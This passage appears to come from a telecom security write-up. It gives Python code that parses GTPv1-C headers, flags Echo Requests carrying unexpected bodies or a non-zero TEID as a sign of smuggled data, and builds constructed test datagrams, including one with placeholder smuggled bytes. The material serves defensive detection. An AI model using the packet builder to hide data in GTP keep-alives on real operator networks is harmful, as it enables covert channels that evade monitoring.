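        seq = struct.unpack("!H", body[:2])[0]
        body = body[4:]                  # skip seq (2), N-PDU (1), next ext (1)
    return GtpHeader(version, (flags >> 4) & 1, msg_type, length, teid, seq, body)


def echo_request_anomaly(hdr: GtpHeader) -> Optional[str]:
    """A healthy Echo Request is header + sequence block and nothing else;
    TS 29.060 also fixes its TEID at 0."""
    if hdr.msg_type != MSG_ECHO_REQUEST:
        return None
    if hdr.teid != 0:
        return "echo request with non-zero TEID"
    if not hdr.body:
        return None
    if hdr.body[0] == IE_PRIVATE_EXTENSION:
        return f"echo request carries a {len(hdr.body)}-byte private extension (review)"
    return f"echo request carries {len(hdr.body)} unexpected bytes (IE type {hdr.body[0]})"


def scan_datagrams(datagrams: List[bytes]) -> List[Tuple[int, str]]:
    """Run the check over captured GTP-C datagrams; returns (index, reason)."""
    hits = []
    for i, d in enumerate(datagrams):
        try:
            reason = echo_request_anomaly(parse_gtpv1(d))
        except ValueError as exc:
            reason = f"malformed: {exc}"
        if reason:
            hits.append((i, reason))
    return hits


def build_echo_request(seq: int, extra: bytes = b"", teid: int = 0) -> bytes:
    """Constructed test datagram: flags 0x32 = version 1, PT=1, S flag set."""
    opt = struct.pack("!HBB", seq, 0, 0)
    header = struct.pack("!BBHI", 0x32, MSG_ECHO_REQUEST, len(opt) + len(extra), teid)
    return header + opt + extra


# Constructed sample traffic: two keep-alives and one request smuggling extra bytes.
SAMPLE = [
    build_echo_request(1),
    build_echo_request(2, extra=b"CONSTRUCTED-SAMPLE-NOT-A-REAL-COMMAND"),
    build_echo_request(3),
]
```

On a GRX-facing tap, applying the same check to UDP port 2123 traffic gives a narrow, low-noise signal: Echo Requests are frequent but should never carry a body.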